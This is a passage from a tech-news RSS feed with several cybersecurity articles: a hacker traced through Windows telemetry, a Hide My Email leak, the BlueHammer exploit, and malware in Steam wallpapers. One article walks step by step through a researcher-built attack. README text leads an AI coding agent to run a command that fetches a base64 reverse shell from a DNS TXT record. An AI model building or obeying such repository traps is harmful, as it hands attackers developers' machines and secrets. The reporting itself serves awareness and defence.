seek to address.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Arrest and extradition of Scattered Spider hacker shines light on how Windows telemetry GDIDs can identify and track users — Microsoft device identifier is just one digital fingerprint in a software world rife with them ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/arrest-and-extradition-of-scattered-spider-hacker-shines-light-on-how-windows-telemetry-gdids-can-identify-users-microsoft-device-identifier-is-just-one-digital-fingerprint-in-a-software-world-rife-with-them</link>
                                                                            <description>
                            <![CDATA[ While the use of Windows' GDID to catch Scattered Spider hacking group member Peter Stokes is unusual, that device identifier is only one bit of telemetry that can be used to fingerprint a user across the wider Internet these days. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">pjxyUhNHjaGF9MDci5RT2L</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/wqqUyuiXEd3qQNnhnBSYcQ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 08 Jul 2026 10:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/wqqUyuiXEd3qQNnhnBSYcQ-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Digital fingerprint]]></media:description>                                                            <media:text><![CDATA[Digital fingerprint]]></media:text>
                                <media:title type="plain"><![CDATA[Digital fingerprint]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/wqqUyuiXEd3qQNnhnBSYcQ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Internet is buzzing over news that 19-year-old Estonian "hacker" Peter Stokes <a href="https://www.tomshardware.com/software/windows-11-identifier-used-to-track-scattered-spider-perp-after-microsoft-shared-info-with-fbi-19-year-old-us-estonian-hacker-arrested-over-alleged-ties-to-infamous-extortion-group" target="_blank">got nabbed by the authorities and extradited to the U.S.</a> on digital crime charges, mostly thanks to Microsoft Windows' built-in telemetry. The FBI <a href="https://www.justice.gov/usao-ndil/media/1450651/dl">seemingly subpoenaed Microsoft</a>, which coughed up telemetry logs that contained both Stokes' GDID (Global Device Identifier) and websites he visited using his main Windows machine.</p><p>The existence of GDID isn't new by itself, as Windows telemetry's data collection has been extensively <a href="https://troopers.de/downloads/troopers19/TROOPERS19_DM_Telemetry.pdf">analyzed and reported on</a>. It's also been known, and <a href="https://learn.microsoft.com/en-us/windows/privacy/configure-windows-diagnostic-data-in-your-organization">publicly explained by Microsoft</a>, that the extended telemetry modes (Full/Optional instead of Required/Basic) can upload lists of URLs analyzed by SmartScreen and Defender, together with the GDID. In fact, using the Edge browser in this setup can even send every visited URL. The court documents do not reveal which exact mechanism triggered the telemetry upload, though.</p><p>This data collection has long been the source of heated debate and general public disgust. Even though the data is genuinely useful and necessary for debugging (by Microsoft or systems administrators in enterprise environments), the fact that it comes enabled by default in Windows Home and Professional editions is questionable. The fact that those versions don't have a simple, user-facing "Off" switch to fully disable telemetry also adds insult to injury.</p><p>The Peter Stokes arrest appears to be the first public case where these Windows GDIDs were both used as a tracking identifier and contained telemetry data including some of the URLs the defendant visited. The case also prompted a <a href="https://github.com/SmtimesIWndr/gdid-reversal">renewed analysis of the GDID</a> by a security researcher that you might want to look into. From what we can ascertain, it's likely Stokes had his Windows telemetry set to Optional/Full, as Required/Basic doesn't appear to transmit URLs by default.</p><p>Using the telemetry GDID, the FBI easily connected the dashing rogue to his <a href="https://ngrok.com/" target="_blank">ngrok</a>account, because he used that tool in the same session in which he accessed his Facebook and Snapchat accounts. The agents also established a link between travel records, a New York IP address, and a rental at the Empire Hotel, likely facilitated by the photos Stokes posted of his hotel room. The criminal mastermind was equally sneaky (read: not) in his visit to Thailand.</p><p>As many hackers do, he enjoyed some time off playing an obscure game, in this case Ubisoft's Growtopia, shortly before accessing his Apple logins, as well as the aforementioned Facebook and Snapchat logins over the following weeks. Besides Microsoft, Google and Apple also collaborated on the hunting effort, with Google linking Stokes' phishing phone number to the same exact IP address and date where he created the ngrok account. Ever the stealthy craftsman, Stokes had created the ngrok account using the same GMail address connected to a second phone number where he made phishing calls from.</p><p>While it's easy and arguably quite necessary to hoist pitchforks at Microsoft for collecting detailed information about billions of computers by default, security professionals will be quick to remind users that Windows' telemetry is merely one of the many ways to track a user. Even if not by malice, a lot of software simply <em>requires</em> GDID-like identifiers for things like tracking usage, subscription and licensing limitations, activation requests, and hardware detection. And every company behind such software can be subpoenaed by authorities, as exemplified in Stokes' case by Microsoft, Google, Apple, ngrok, and others. Even privacy-oriented services like Proton are careful enough to describe what they can and cannot reveal to authorities under a court order.</p><p>If you're wondering the steps Stokes took to cover his tracks, though, you'd be looking at a small list. He did route his connections through a VPN hosted at <a href="https://www.tzulo.com/">servers from Tzulo</a> along with the developer-oriented <a href="https://ngrok.com/">ngrok tunneling service</a> and <a href="https://teleport.sh/">teleport.sh</a>. Unfortunately, the modern digital world allows for many forms of identification, and hiding one's source IP address is merely one of them.</p><p>Using a VPN is recommended for digital anonymity, but it's merely the first of many necessary steps and can even backfire when not set up  carefully. If misconfigured, a VPN may allow certain applications and operating system features to talk to the outside world using the original IP instead of the hidden one. Plus, the VPN will not stop the operating system or any application from sending out identifying information to begin with.</p><p>Perhaps more worryingly still, modern-day <a href="https://fingerprint.com/">device and user fingerprinting</a> is far more insidious and hard to counter. For example, plain web browsers <a href="https://browserleaks.com/">are notorious leakers</a> of personal information, as data-harvesting companies can weaponize features like TLS levels, HTML5 Canvas functionality, the fonts list, and even Widevine DRM in a combination that uniquely identifies a visitor. Stokes now has plenty of time to read up on the EFF's <a href="https://ssd.eff.org/">surveillance self-defense guides</a> and get acquainted with the scripts at the <a href="https://privacy.sexy/">Privacy Is Sexy website</a>.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Apple's Hide My Email service reportedly reveals users' actual email addresses with little effort — Cupertino has seemingly known about the problem for a year but has yet to fix it ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/apples-hide-my-email-service-reportedly-reveals-users-actual-email-addresses-with-little-effort-cupertino-has-seemingly-known-about-the-problem-for-a-year-but-has-yet-to-fix-it</link>
                                                                            <description>
                            <![CDATA[ Apple's Hide My Email service still reveals users' actual email addresses with little effort — even though it's been a year since the company was notified about problem. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">NLmwHZNd5R2jXmM62NQpGg</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LHZ4Rgs8Ttj8heEhX9c7K7-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 02 Jul 2026 10:40:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LHZ4Rgs8Ttj8heEhX9c7K7-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Tim Cook looking happy]]></media:description>                                                            <media:text><![CDATA[Tim Cook looking happy]]></media:text>
                                <media:title type="plain"><![CDATA[Tim Cook looking happy]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LHZ4Rgs8Ttj8heEhX9c7K7-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>If you read or watch any privacy tutorial on the internet, one of the first tips will be to start using anonymized email addresses in some form — providing a fake email that redirects to your real one. Many email providers offer this functionality, and so does Apple's basic paid iCloud plan with the Hide My Email feature. But apparently Apple's implementation of the feature is trivial to crack — which means anyone can find your real email address with little effort, <a href="https://www.404media.co/apple-hide-my-email-vulnerability-reveals-peoples-real-email-addresses/" target="_blank">according to 404 Media</a>.<br></p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: CPU</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Xh2MupWrRjJPiLLuopmKRB" name="W1103180" caption="" alt="A hand holding the Ryzen 7 9850X3D." src="https://cdn.mos.cms.futurecdn.net/Xh2MupWrRjJPiLLuopmKRB.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Tom's Hardware)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/cpu-scaling-with-dlss-investigating-cpu-performance-in-the-age-of-upscaling?utm_source=edit-links&utm_medium=boxout&utm_term=cpu" target="_blank">CPU scaling with DLSS</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cpus/ryzen-to-the-top-how-amd-innovated-in-the-gaming-cpu-market?utm_source=edit-links&utm_medium=boxout&utm_term=cpu" target="_blank">Ryzen to the top: How AMD innovated in the gaming CPU market</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/how-arm-is-working-its-way-into-pcs-and-data-centers-inside-the-products-and-trends-behind-the-hype?utm_source=edit-links&utm_medium=boxout&utm_term=cpu" target="_blank">How ARM is working its way into PCs</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/amd-ces-2026-gaming-trends-press-q-and-a-roundtable-transcript-we-see-a-little-bit-of-an-uptick-in-the-percentage-of-am4-versus-am5-platforms?utm_source=edit-links&utm_medium=boxout&utm_term=cpu" target="_blank">AMD CES 2026 gaming trends press Q&A roundtable transcript</a></li></ul></p></div></div><p>The privacy vulnerability has been known to Apple for just over a year, and was first reported by Tyler Murphy, co-founder of data removal company EasyOptOuts. The folks at 404 Media claim they tested the vulnerability themselves and that, sure enough, it takes minimal effort to figure out the real address behind the fake alias — with a 100% success rate.<br><br>Apple doesn't seem to be bothered by the issue, given that Murphy revealed the problem in June 2025, and the company only executed a fix in March 2026. Post-fix, however, Murphy verified the issue remained (and apparently the last time he heard back from Apple back was in May, when the company said said it was still investigating). There are no further updates, it seems, and this is poor optics for a company that <a href="https://www.tomshardware.com/software/macos/apple-demonstrates-cross-platform-siri-upgrades-in-macos-27-golden-gate-at-wwdc-update-brings-liquid-glass-improvements-and-unifies-ai-strategy">talks a big game about user data privacy</a>.<br><br>Neither the researcher nor 404 media divulged the exact mechanism, despite the one-year timeframe being well past the common 90-day security vulnerability disclosure window. This is likely to avoid putting a lot of users at risk of exposure, considering that Apple has <a href="https://techcrunch.com/2025/01/30/apple-tops-1-billion-subscriptions-nearly-100-billion-in-services-revenue-in-2024/" target="_blank">passed one billion paid subscribers</a>. Even if only 1% of users use Hide My Email, that still accounts for 10 million people. <br><br>Given the lack of technical details, it's hard to pin down where the problem could lie. Accidental revelations of aliased emails have happened several times, by the hand of <a href="https://www.reddit.com/r/ios/comments/1dub5gx/serious_icloud_hide_my_email_bug_revealing_main/" target="_blank">client software trying to be helpful</a> and "fixing" the reply path, and by <a href="https://www.sindastra.de/p/2160/psa-apple-hide-my-email-reply-leak" target="_blank">servers mismanaging email headers</a>.<br><br>Perhaps adding insult to injury, Apple recently stated that it's going to move Hide My Email addresses to their own domain, "private.icloud.com", making it easy for websites to reject such addresses in a bid to always have users' real contact info. Murphy suggested that the company stop sales of the Hide My Email feature until the data leak matter is resolved, but, again, there's been no response. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Windows Defender 'BlueHammer' vulnerability now exploited as part of malware campaigns — CISA issues warning despite patch release on April 14 ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/windows-defender-bluehammer-vulnerability-now-exploited-as-part-of-malware-campaigns-cisa-issues-warning-despite-patch-release-on-april-14</link>
                                                                            <description>
                            <![CDATA[ Windows Defender "BlueHammer" vulnerability now exploited as part of malware campaigns — event demonstrates lack of security awareness despite existence of patches ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">JGa2WerozceW3R3nXAR9dd</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/vPMxZmbSf9QNjHhihRRvbL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 30 Jun 2026 16:20:59 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/vPMxZmbSf9QNjHhihRRvbL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Update reminder]]></media:description>                                                            <media:text><![CDATA[Update reminder]]></media:text>
                                <media:title type="plain"><![CDATA[Update reminder]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/vPMxZmbSf9QNjHhihRRvbL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Late spring and early summer in the cybersecurity world were marked by multiple Windows exploits, thanks to the efforts of the <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation">controversial hacker figure Nightmare Eclipse</a>. One of the better-known exploits is BlueHammer, a race condition in Windows Defender that gets you a shell with access to the SYSTEM user with just a small script — in other words, the keys to the kingdom in exchange for a double-click. Microsoft released a patch on April 14, but as a clear illustration of the lack of cybersecurity awareness, CISA (the U.S. cyber-defense agency) <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=CVE-2026-33825&field_date_added_wrapper=all&field_cve=&sort_by=field_date_added&items_per_page=20&url= Kown to be used in ransomware campaigns" target="_blank">yesterday marked</a> BlueHammer as actively exploited in ransomware campaigns.</p><p>That marks about a month and a half since the patch, and it illustrates quite clearly that when it comes to computer security, the publication of a patch is almost always the easy part; getting that patch into every device that needs it is the real tricky bit. The patch is part of standard Windows updates, too, so there's really no technical reason for not installing it. Additionally, since BlueHammer gets the attackers a SYSTEM shell, the ransomware in question may encrypt parts of the OS or the boot process rather than "just" the data files, potentially making machines unusable on top.</p><p>While stating that "people don't patch their machines" is a broad statement that won't surprise anyone in the field, a recent report from <a href="https://www.absolute.com/press-releases/cybercriminals-have-open-access-to-enterprise-pcs-76-days-per-year-according-to-new-research-from-absolute-security" target="_blank">security vendor Absolute claims</a> the application of critical OS patches across Windows 11 and 10 lags 127 days (over 4 months) on average, and that figure basically doubled since last year. Even in enterprise settings, Absolute says the average time-to-patch is shockingly high at 76 days, or 2.5 months. While one vendor's claims aren't gospel, the figures aren't too hard to believe; plus, they're averages, meaning half the machines purportedly go unpatched for longer than those timeframes.</p><p>Depending on the source, estimates on the percentage of Windows 10 machines can vary between <a href="https://www.pcbenchmarks.net/os-marketshare.html">15% (PassMark)</a> and <a href="https://gs.statcounter.com/windows-version-market-share/desktop/">26% (StatCounter)</a>. Calling it 20% for simplicity's sake, that's 1 out of 5 machines almost guaranteed to be unpatched. Techies like us know full well that Microsoft has extended security updates (ESU) <a href="https://www.tomshardware.com/software/windows/microsoft-extends-free-windows-10-security-updates-for-a-second-year">for Windows 10 twice now</a>, with the new real EOL now being October 14, 2027. The problem is, although enrolling a machine into ESU is trivial, the lack of public awareness essentially guarantees these machines will remain vulnerable until they're upgraded or replaced.</p><p>Meanwhile, <a href="https://blog.projectnightcrawler.dev/posts/2026-06-22-microsoft-is-an-interesting-company/" target="_blank">Nightmare Eclipse says</a> they're "done with taking a break", and that "July will be an incredibly interesting month because [they] will drop some really interesting and possibly insanely controversial findings." </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AI coding agents can be tricked into installing malware via 'clean' GitHub repositories — Mozilla's 0din team shows how Claude Code can be exploited by its own helpfulness ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/ai-coding-agents-can-be-tricked-into-installing-malware-via-clean-github-repositories-mozillas-0din-team-shows-how-claude-code-can-be-exploited-by-its-own-helpfulness</link>
                                                                            <description>
                            <![CDATA[ Claude and other AI agents fooled into running malware with just a minimal GitHub repository — ask the bot to initialize the project and you get hacked ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">q4fgrLcFMsMdBYGRKCZs2R</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ScT7C9WsuqruarWf3kSRRG-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sun, 28 Jun 2026 11:30:00 +0000</pubDate>                                                                                                                                <updated>Sun, 28 Jun 2026 12:56:25 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ScT7C9WsuqruarWf3kSRRG-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Anthropic Claude]]></media:description>                                                            <media:text><![CDATA[Anthropic Claude]]></media:text>
                                <media:title type="plain"><![CDATA[Anthropic Claude]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ScT7C9WsuqruarWf3kSRRG-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>"Think out of the box" is painted onto millions of motivation posters across the world, a shooting message for middle managers and eliciting eyerolls from most everyone else. And yet that's exactly what the researchers at Mozilla's 0din did, by tricking Claude into running malware in a roundabout yet deceptively simple way, by merely asking it to initialize a project from a pretty clean-looking GitHub repository.</p><p>An attacker would then have control over the developer's own account, accessing all their secrets, API keys, code, documents, browser sessions, and passwords. They could even install additional malware to maintain permanent access. Suffice to say, almost every bot agent is susceptible to this type of attack, though Claude is the default choice for programming tasks.</p><p>Here's how it works. All a victim developer has to do is tell Claude to initialize a project from a malicious GitHub repository (or tell it to configure it after cloning it themselves). Said repo looks pretty clean, with just a handful of scaffolding files, and most importantly, nothing that will trigger security tools, whether remote, local, or even Claude's own checks.</p><p>Claude will clone the repo. The first file it will process will be a "readme" or Markdown file describing how to initialize a Python environment with the Axiom package, a commonly used monitoring tool. So far, this appears completely legitimate. However, there's a fake Axiom startup script that will simply error out the first time it's run. This is the first step that tricks the box, because in order to be helpful and solve the problem, it'll run another innocuous-looking command to initialize Axiom: "python3 -m axiom init".  </p><p>This then triggers a shell script that downloads a bit of software to run, another standard operation that won't raise an eyebrow. But the second trick is that instead of downloading from a malicious URL that could be scanned, the script reads the DNS text records of a specific domain — in this case, the domain "_axiom-config.m100.cloud". This too looks kosher enough, as for example, e-mail and by extension its configuration tools extensively rely on TXT records.</p><p>The said TXT record contains an encoded (base64) string that just opens a reverse shell, meaning it'll open a shell on the user's machine, but redirected to the attacker's server for input. At this point, the malfeasants can fish out everything that the user has access to and proceed to run software as the user. Meanwhile, all that Claude and the victim see is an "Environment ready" message or similar.</p><p>If you've been counting, this is three steps of indirection, none of which in isolation look like anything much out of the ordinary. Very few (if any) security scanning tools would even flag the repository, and none of the activity, save for the actual opening of a remote shell, even looks particularly odd. An enterprise environment with very tightly controlled network access could catch it, but that's not where the vast majority of developers operate in. It's also worth stressing that this particular implementation is just one example of a concept that can be applied to even more indirect and elaborate methods.</p><p>The 0din team concludes its report by stating the reasonably obvious: that developers should never blindly trust an unknown project as trusted code, and naturally, not trust the AI tool itself for security analysis purposes. As for the agents themselves, 0din states they need to inspect what actually will run and how, instead of simply following steps.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky finds malware hidden in Steam Wallpaper Engine that hijacks accounts to spread itself — dozens of malicious packages downloaded tens of thousands of times ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/kaspersky-finds-malware-hidden-in-steam-wallpapers-that-hijacks-accounts-to-spread-itself</link>
                                                                            <description>
                            <![CDATA[ Attackers have spent the past several months smuggling malware into Steam through animated desktop wallpapers. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">AwTFZwAMFsK7WsjNEtZx9f</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jS2KpLGCKtRh4kpnLWBr59-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Jun 2026 10:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jS2KpLGCKtRh4kpnLWBr59-1280-80.jpg">
                                                            <media:credit><![CDATA[Valve]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Steam Hardware Survey April 2022]]></media:description>                                                            <media:text><![CDATA[Steam Hardware Survey April 2022]]></media:text>
                                <media:title type="plain"><![CDATA[Steam Hardware Survey April 2022]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jS2KpLGCKtRh4kpnLWBr59-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Attackers have spent the past several months smuggling malware into Steam through animated desktop wallpapers, hijacking the accounts of victims who install them and then using those stolen accounts to upload more infected files. That’s according to Kaspersky researchers Maxim Starodubov and Denis Brylev, who recently authored a report published on <a href="https://securelist.com/dozens-of-malicious-wallpapers-found-on-steam-workshop/120186/" target="_blank"><em>Securelist</em></a>. Per the report, the malware campaign has been running since late last year and focuses on gamers in China, pushing everything from credential stealers to crypto miners and ransomware. Kaspersky found dozens of malicious packages, some downloaded tens of thousands of times before removal.</p><p>The culprit is Wallpaper Engine, a $4.99 live wallpaper tool that ranks among Steam's most-used non-game titles, with 93,000 to 114,000 concurrent users and nearly a million reviews. The app supports four wallpaper types, and one of them, the "application wallpaper," is a standalone executable Windows program that runs as the desktop background. That also makes it a pathway for third-party code to execute on a user's machine, which is exactly what attackers exploited.</p><div style="min-height: 250px;">                                <div class="kwizly-quiz kwizly-ONVdVO"></div>                            </div>                            <script src="https://kwizly.com/embed/ONVdVO.js" async></script><p>Kaspersky observed two delivery methods. In some packages, the malicious EXE files, DLLs, or scripts sat directly alongside the legitimate wallpaper files. In others, the payload was tucked inside a password-protected archive, with the password either embedded in the archive name or in a JSON config file, allowing a script to open it automatically. Applying the wallpaper triggered the payload.</p><p>In a sample examined last December, the researchers managed to boot a functional desktop game while discreetly dropping a DarkKomet backdoor named Synaptics.exe and a tampered system library, AggregatorHost.dll. That library locates the running Steam app, hunts for account credentials, hijacks the live session, and ships the data to a command-and-control server. Control of an active session lets the attackers post fresh malicious wallpapers under the victim's name, which is why the campaign keeps regenerating after takedowns.</p><p>Kaspersky placed 89% of malicious download attempts in China, followed by Russia at 5.5% and smaller shares in Singapore, Hong Kong, Germany, Vietnam, India, and Canada. That concentration aligns with the wider Wallpaper Engine user base, which skews heavily toward China. Payloads spanned the DarkKomet backdoor, the Lumma and Vidar infostealers, the RenEngine loader, miners, and ransomware, a spread the researchers attributed to multiple independent groups piling onto the same technique rather than a lone threat actor or group.</p><p>This follows a run of malware reaching players through Valve's storefront over the past few years. A<a href="https://www.tomshardware.com/tech-industry/cyber-security/steam-game-mod-delivered-malware-on-christmas-day-epsilon-information-stealer-was-hidden-in-a-slay-the-spire-expansion"> compromised Slay the Spire mod</a> was distributed through the Workshop on Christmas Day 2023, the<a href="https://www.tomshardware.com/tech-industry/cyber-security/hacker-plants-three-strains-of-malware-in-a-steam-early-access-game-called-chemia-security-company-found-crypto-jacking-infostealers-and-a-backdoor-to-install-yet-more-malware-in-the-future"> Chemia</a> Early Access game shipped with three malware strains in July last year, and the<a 